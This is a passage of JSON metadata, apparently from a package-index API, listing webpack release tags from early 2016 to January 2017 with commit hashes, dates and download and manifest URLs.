0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.gith